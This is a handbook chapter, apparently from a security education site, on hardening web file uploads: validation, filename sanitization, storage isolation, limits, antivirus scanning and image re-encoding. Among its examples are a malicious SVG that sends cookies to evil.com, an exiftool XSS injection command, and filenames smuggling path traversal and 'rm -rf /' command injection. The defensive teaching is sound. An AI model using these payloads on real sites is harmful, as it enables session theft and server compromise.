Cybersecurity Handbook Web Building Securely Without Delay Immediate Measures (15 Minutes) Why This Matters 1 Why File Uploads Are Dangerous 2 File Type Validation

File Upload Hardening

Q: Immediate measures (15 minutes) First implement input validation, safe output encoding, and parameterized queries. Harden authentication, session management, and security headers as a baseline. Embed measures in CI/CD with tests, linting, and release gates. Why this matters

The core of File Upload Hardening is risk reduction in practice. Technical context supports the choice of measures, but implementation and embedding are central.

Q: File type validation Extension allowlist

Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.

Q: MIME type validation

The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:

Q: os.path.basename() is not enough

os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:

File Upload Hardening

Building Securely Without Delay

Web risk is rarely mysterious. It usually lies in predictable mistakes that persist under time pressure.

In File Upload Hardening you reduce risk with type checking, isolation, scanning, and restricted execution permissions.

This makes security less of a loose afterthought check and more of a standard quality of your product.

Immediate measures (15 minutes)

First implement input validation, safe output encoding, and parameterized queries.
Harden authentication, session management, and security headers as a baseline.
Embed measures in CI/CD with tests, linting, and release gates.

Why this matters

The core of File Upload Hardening is risk reduction in practice. Technical context supports the choice of measures, but implementation and embedding are central.

Why file uploads are dangerous

An unsecured file upload opens the door to virtually every attack category:

Attack	Mechanism	Impact
Malware distribution	Server is used to host and distribute malware	Reputational damage, legal liability
Path traversal	Filename contains `../../` to write outside the upload directory	Overwriting configuration files, RCE
Denial of Service	Extremely large files or enormous numbers of uploads	Disk space exhausted, service unavailable
Stored XSS via SVG	SVG file with embedded `<script>` tags	Session theft, account takeover
Stored XSS via HTML	HTML file with JavaScript, served with `text/html`	Session theft, phishing
EXIF data injection	Metadata in images contains payloads	XSS, SQL injection via metadata parsing
XML External Entity	Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads	SSRF, file disclosure
Polyglot files	File is simultaneously a valid JPEG and a valid PHP script	Bypass of validation, RCE

The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.

File type validation

Extension allowlist

Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.

# Python - extension allowlist
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}

def allowed_file(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS

// Node.js - extension allowlist
const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);

function allowedFile(filename) {
  const ext = path.extname(filename).toLowerCase();
  return ALLOWED_EXTENSIONS.has(ext);
}

MIME type validation

The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:

# Python - server-side MIME detection with python-magic
import magic

def validate_mime(filepath: str, allowed_mimes: set) -> bool:
    mime = magic.from_file(filepath, mime=True)
    return mime in allowed_mimes

ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}

// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';

async function validateMime(filepath, allowedMimes) {
  const result = await fileTypeFromFile(filepath);
  if (!result) return false;
  return allowedMimes.has(result.mime);
}

// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($filepath);
    return in_array($mime, $allowedMimes, true);
}

Magic bytes validation

Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.

File type	Magic bytes (hex)	Extension	MIME type
JPEG	`FF D8 FF`	`.jpg`, `.jpeg`	`image/jpeg`
PNG	`89 50 4E 47 0D 0A 1A 0A`	`.png`	`image/png`
GIF87a	`47 49 46 38 37 61`	`.gif`	`image/gif`
GIF89a	`47 49 46 38 39 61`	`.gif`	`image/gif`
PDF	`25 50 44 46 2D`	`.pdf`	`application/pdf`
ZIP (DOCX/XLSX)	`50 4B 03 04`	`.zip`, `.docx`, `.xlsx`	`application/zip`
RIFF (WebP)	`52 49 46 46`	`.webp`	`image/webp`
SVG	`3C 3F 78 6D 6C` or `3C 73 76 67`	`.svg`	`image/svg+xml`

# Python - magic bytes validation
MAGIC_BYTES = {
    b'\xff\xd8\xff': 'image/jpeg',
    b'\x89PNG\r\n\x1a\n': 'image/png',
    b'GIF87a': 'image/gif',
    b'GIF89a': 'image/gif',
    b'%PDF-': 'application/pdf',
}

def check_magic_bytes(filepath: str) -> str | None:
    with open(filepath, 'rb') as f:
        header = f.read(8)
    for magic, mime in MAGIC_BYTES.items():
        if header.startswith(magic):
            return mime
    return None

Combined validation

Never rely on a single layer. Combine all three methods:

def validate_upload(filename: str, filepath: str) -> bool:
    # Layer 1: extension
    if not allowed_file(filename):
        return False
    # Layer 2: magic bytes
    detected_type = check_magic_bytes(filepath)
    if detected_type not in ALLOWED_MIMES:
        return False
    # Layer 3: server-side MIME
    if not validate_mime(filepath, ALLOWED_MIMES):
        return False
    return True

Filename sanitization

The original filename of an upload is user input and must be treated as such. Never trust it.

Dangerous filenames

Attack technique	Example	Risk
Path traversal	`../../../etc/cron.d/backdoor`	Overwriting files outside upload dir
Null byte injection	`shell.php%00.jpg`	Old parsers see `.jpg`, server executes `.php`
Double extension	`document.php.jpg`	Depending on server configuration: execution as PHP
Unicode tricks	`image\u202E\u0067np.php` (right-to-left override)	Filename appears as `imagphp.png` in UI
Overlength name	`A` x 10000 + `.jpg`	Buffer overflows, filesystem errors
Special characters	`; rm -rf / ;.jpg`	Command injection with unsafe processing
Windows reserved	`CON.jpg`, `NUL.png`, `AUX.pdf`	System errors on Windows servers
Dots and spaces	`shell.php.` or `shell.php`	Windows strips trailing dots/spaces: becomes `shell.php`

Safe approach: renaming

The safest strategy is to completely ignore the original filename and assign a UUID:

import uuid
import os

def safe_filename(original_filename: str) -> str:
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"Extension not allowed: {ext}")
    return f"{uuid.uuid4().hex}{ext}"

// Node.js
const { randomUUID } = require('crypto');
const path = require('path');

function safeFilename(originalFilename) {
  const ext = path.extname(originalFilename).toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(ext)) {
    throw new Error(`Extension not allowed: ${ext}`);
  }
  return `${randomUUID().replace(/-/g, '')}${ext}`;
}

If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:

# Database: preserve original name, UUID on disk
upload = Upload(
    original_name=secure_filename(file.filename),
    stored_name=safe_filename(file.filename),
    uploaded_by=current_user.id
)

os.path.basename() is not enough

os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:

# Minimum: basename + Werkzeug secure_filename
from werkzeug.utils import secure_filename

name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in database

Storage hardening

Store outside the webroot

Rule number one: never store uploads in a directory that is directly served by the web server. If an attacker uploads a webshell to /var/www/html/uploads/, they can call it directly via the browser.

# Wrong: inside webroot
/var/www/html/
  ├── index.php
  └── uploads/        <-- directly accessible via http://site/uploads/
      └── shell.php   <-- http://site/uploads/shell.php = RCE

# Correct: outside webroot
/var/www/html/
  └── index.php
/srv/uploads/          <-- not directly accessible via HTTP
  └── a3f8b2c1.jpg

Serve uploads via an application route that enforces access control and content-type headers:

# Flask - serve uploads via application
@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
    upload = Upload.query.get_or_404(file_id)
    return send_from_directory(
        app.config['UPLOAD_FOLDER'],
        upload.stored_name,
        mimetype=upload.detected_mime,  # No text/html!
        as_attachment=True
    )

Dedicated storage service

Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:

# AWS S3 - pre-signed upload URL
import boto3

s3 = boto3.client('s3')

def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
    return s3.generate_presigned_url(
        'put_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ContentType': 'image/jpeg',
        },
        ExpiresIn=expires
    )

# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
    return s3.generate_presigned_url(
        'get_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ResponseContentDisposition': 'attachment',
        },
        ExpiresIn=expires
    )

No execute permissions

Ensure that the upload directory has no execute permissions:

# Filesystem permissions
chmod 750 /srv/uploads
chown www-data:www-data /srv/uploads
# No execute bit on files
chmod 640 /srv/uploads/*

Nginx: block execution in upload directory

# nginx - block script execution in upload location
location /uploads/ {
    # Force download, never execute
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;

    # Explicitly block all script extensions
    location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
        deny all;
        return 403;
    }

    # No directory listing
    autoindex off;
}

Separate domain for user content

Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:

# Main application
app.example.com          -> session cookies, CSRF tokens

# User content (separate domain, no cookies from main app)
content.example.com      -> uploads, profile images

If an attacker achieves XSS via an uploaded SVG file on content.example.com, they have no access to cookies from app.example.com.

Size and quantity limits

Without limits, your upload endpoint is an invitation for Denial of Service.

Server configuration

# nginx - maximum body size
http {
    client_max_body_size 10m;    # Global: max 10 MB
    client_body_timeout 30s;     # Timeout for receiving body
    client_body_buffer_size 128k;
}

# Per location override
location /api/upload {
    client_max_body_size 25m;    # Specific endpoint: max 25 MB
}

# Apache
LimitRequestBody 10485760

Application limits

# Flask - file size limit
app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024  # 10 MB

@app.errorhandler(413)
def too_large(e):
    return jsonify(error="File too large (max 10 MB)"), 413

// Express + multer - file size and quantity limits
const multer = require('multer');

const upload = multer({
  dest: '/srv/uploads/',
  limits: {
    fileSize: 10 * 1024 * 1024,  // 10 MB per file
    files: 5,                     // Max 5 files per request
    fields: 10,                   // Max 10 form fields
  },
  fileFilter: (req, file, cb) => {
    const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
    const ext = path.extname(file.originalname).toLowerCase();
    cb(null, allowed.includes(ext));
  }
});

app.post('/upload', upload.array('files', 5), (req, res) => {
  res.json({ uploaded: req.files.length });
});

Rate limiting

# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter

limiter = Limiter(app, key_func=get_remote_address)

@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour")          # Max 10 uploads per hour per IP
@limiter.limit("3/minute")         # Max 3 per minute
def upload_file():
    ...

Antivirus scanning

Scan every uploaded file for malware before it is stored or made available.

ClamAV integration

# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam                     # Signature update
sudo systemctl start clamav-daemon

# Python - scanning with pyclamd
import pyclamd

class VirusScanner:
    def __init__(self):
        self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
        if not self.cd.ping():
            raise RuntimeError("ClamAV daemon not reachable")

    def scan_file(self, filepath: str) -> tuple[bool, str | None]:
        """Returns (is_clean, threat_name)."""
        result = self.cd.scan_file(filepath)
        if result is None:
            return True, None
        # result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
        status, threat = list(result.values())[0]
        return False, threat

# Usage in upload handler
scanner = VirusScanner()

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    temp_path = os.path.join('/tmp', safe_filename(file.filename))
    file.save(temp_path)

    is_clean, threat = scanner.scan_file(temp_path)
    if not is_clean:
        os.remove(temp_path)
        app.logger.warning(f"Malware detected: {threat}")
        return jsonify(error="File rejected by virus scanner"), 400

    # File is clean, move to permanent storage
    final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
    shutil.move(temp_path, final_path)
    return jsonify(status="ok"), 201

Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.

Image-specific risks

SVG with embedded JavaScript

SVG is XML and can contain arbitrary JavaScript:

<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>document.location='https://evil.com/?c='+document.cookie</script>
  <rect width="100" height="100" fill="red"/>
</svg>

Defense: never serve SVG with Content-Type: image/svg+xml if it is user-uploaded content. Use Content-Disposition: attachment or convert to a raster format.

EXIF data with payloads

EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:

# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpg

Image re-encoding as defense

By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:

# Python - strip EXIF and re-encode with Pillow
from PIL import Image
import io

def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
    """Re-encode image: strips EXIF, removes embedded content."""
    with Image.open(input_path) as img:
        # Verify that it is actually an image
        img.verify()

    # Reopen after verify (verify makes object unusable)
    with Image.open(input_path) as img:
        # Convert to RGB (removes alpha-channel tricks)
        if img.mode not in ('RGB', 'L'):
            img = img.convert('RGB')

        # Limit dimensions
        img.thumbnail(max_size, Image.LANCZOS)

        # Save without EXIF data
        img.save(output_path, format='JPEG', quality=85, exif=b'')

// Node.js - re-encode with sharp
const sharp = require('sharp');

async function sanitizeImage(inputPath, outputPath) {
  await sharp(inputPath)
    .rotate()                    // Auto-rotate based on EXIF, then strip
    .resize(4096, 4096, {
      fit: 'inside',
      withoutEnlargement: true
    })
    .removeAlpha()
    .jpeg({ quality: 85 })
    .toFile(outputPath);
}

Content-Security-Policy for uploads

Add a strict CSP to responses for user-uploaded content:

@app.after_request
def add_upload_csp(response):
    if request.path.startswith('/files/'):
        response.headers['Content-Security-Policy'] = (
            "default-src 'none'; "
            "style-src 'none'; "
            "script-src 'none'; "
            "object-src 'none'"
        )
        response.headers['X-Content-Type-Options'] = 'nosniff'
    return response

It is always a delight to see how applications handle file uploads. "The user can upload a profile photo here," says the product owner, with full confidence that users will obediently pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline from the public internet to your server's filesystem, protected by exactly zero layers of validation and an extension blocklist that contains .exe and .bat but forgot .php. Because yes, who uploads a PHP file as a profile photo? Only everyone who wants to take over your application. But no worries -- the Content-Type header says image/jpeg, so it must be safe. That header is after all set by... the attacker. The same type of logic as a nightclub that asks visitors to write their own age on a note. "He wrote 21, let him through." And to top it all off we store everything nicely in /var/www/html/uploads/, directly accessible and executable via the browser, because that saves us configuring a proxy route. Security by convenience.

Common mistakes

#	Mistake	Why it is dangerous	Solution
1	Extension check only	Trivially bypassed by renaming	Combine with magic bytes and MIME detection
2	Blocklist instead of allowlist	You always forget an extension (`.phtml`, `.phar`, `.shtml`)	Use a strict allowlist
3	Trusting the Content-Type header	Set by the client, fully manipulable	Server-side detection with libmagic/file-type
4	Storage in webroot	Direct execution of uploaded script	Store outside webroot, serve via application
5	Keeping the original filename	Path traversal, double extensions, Unicode tricks	UUID renaming, original name in database
6	No size limit	DoS through large uploads	Configure max on web server and application
7	No rate limiting	Brute force upload, disk space exhaustion	Limit per IP per time unit
8	Allowing SVG without sanitization	Embedded JavaScript, XSS	Block SVG or convert to raster
9	Passing EXIF data to frontend	XSS via metadata fields	Strip EXIF, re-encode images
10	No antivirus scanning	Malware distribution via your platform	Integrate ClamAV or similar scanner
11	No Content-Disposition header	Browser renders file instead of downloading	Always `attachment` for user content
12	Same domain for app and uploads	XSS in upload has access to session cookies	Use a separate content domain

Checklist

Priority	Measure	Implementation
CRITICAL	Extension allowlist	Code: only accept explicitly permitted extensions
CRITICAL	Magic bytes validation	Code: python-magic, file-type, finfo
CRITICAL	Storage outside webroot	Infrastructure: separate directory, serve via app route
CRITICAL	Filename sanitization	Code: UUID renaming, original name in database
HIGH	Size limits	Web server: `client_max_body_size`; App: `MAX_CONTENT_LENGTH`
HIGH	Remove execute permissions	Infrastructure: `chmod`, nginx location block
HIGH	Content-Disposition header	Code/web server: `attachment` for all user uploads
HIGH	X-Content-Type-Options: nosniff	Code/web server: prevent MIME sniffing by browser
HIGH	Image re-encoding	Code: Pillow/sharp for strip EXIF + re-encode
MEDIUM	Antivirus scanning	Infrastructure: ClamAV daemon + pyclamd integration
MEDIUM	Rate limiting	Code: Flask-Limiter, express-rate-limit
MEDIUM	Separate content domain	Infrastructure: `content.example.com` for user uploads
MEDIUM	CSP on upload responses	Code: strict `Content-Security-Policy` header
LOW	Pre-signed URLs (S3/GCS)	Infrastructure: object storage with temporary URLs
LOW	SVG-to-raster conversion	Code: Pillow/sharp/Inkscape for SVG sanitization

Summary -- File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. The combination of strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious -- because it is, until proven otherwise.

In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.

← Previous API Security Next → OAuth & OpenID Connect

Op de hoogte blijven?

Ontvang maandelijks cybersecurity-inzichten in je inbox.

← Web Security ← Home

File Upload Hardening

File Upload Hardening

Building Securely Without Delay

Immediate measures (15 minutes)

Why this matters

Why file uploads are dangerous

File type validation

Extension allowlist

MIME type validation

Magic bytes validation

Combined validation

Filename sanitization

Dangerous filenames

Safe approach: renaming

os.path.basename() is not enough

Storage hardening

Store outside the webroot

Dedicated storage service

No execute permissions

Nginx: block execution in upload directory

Separate domain for user content

Size and quantity limits

Server configuration

Application limits

Rate limiting

Antivirus scanning

ClamAV integration

Image-specific risks

SVG with embedded JavaScript

EXIF data with payloads

Image re-encoding as defense

Content-Security-Policy for uploads

Common mistakes

Checklist

Further reading in the knowledge base

Op de hoogte blijven?

Support this project

File Upload Hardening

Building Securely Without Delay

Immediate measures (15 minutes)

Why this matters

Why file uploads are dangerous

File type validation

Extension allowlist

MIME type validation

Magic bytes validation

Combined validation

Filename sanitization

Dangerous filenames

Safe approach: renaming

os.path.basename() is not enough

Storage hardening

Store outside the webroot

Dedicated storage service

No execute permissions

Nginx: block execution in upload directory

Separate domain for user content

Size and quantity limits

Server configuration

Application limits

Rate limiting

Antivirus scanning

ClamAV integration

Image-specific risks

SVG with embedded JavaScript

EXIF data with payloads

Image re-encoding as defense

Content-Security-Policy for uploads

Common mistakes

Checklist

Further reading in the knowledge base

Related security measures

Op de hoogte blijven?

Gerelateerde artikelen

Threat Modeling in Practice

ADR Security Decision-Making

Reference Architectures (Web, Network, Cloud)